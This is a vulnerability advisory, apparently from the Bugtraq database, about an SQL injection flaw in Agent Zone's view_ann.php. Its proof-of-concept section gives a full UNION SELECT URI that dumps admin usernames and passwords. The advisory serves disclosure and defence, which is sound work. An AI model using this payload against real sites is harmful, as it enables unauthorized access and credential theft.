BID:31032

Agent Zone 'view_ann.php' SQL Injection Vulnerability

Info

Agent Zone 'view_ann.php' SQL Injection Vulnerability

Bugtraq ID:	31032
Class:	Input Validation Error
CVE:	CVE-2008-3951
Remote:	Yes
Local:	No
Published:	Sep 05 2008 12:00AM
Updated:	May 07 2015 05:24PM
Credit:	DeViL iRaQ
Vulnerable:	Vastal I-Tech Agent Zone 0

Not Vulnerable:

Discussion

Agent Zone 'view_ann.php' SQL Injection Vulnerability

Agent Zone is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Exploit / POC

Agent Zone 'view_ann.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/view_ann.php?ann_id=-6+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_user

Solution / Fix

Agent Zone 'view_ann.php' SQL Injection Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].

References

Agent Zone 'view_ann.php' SQL Injection Vulnerability

References:

Agent Zone Homepage (Vastal I-Tech)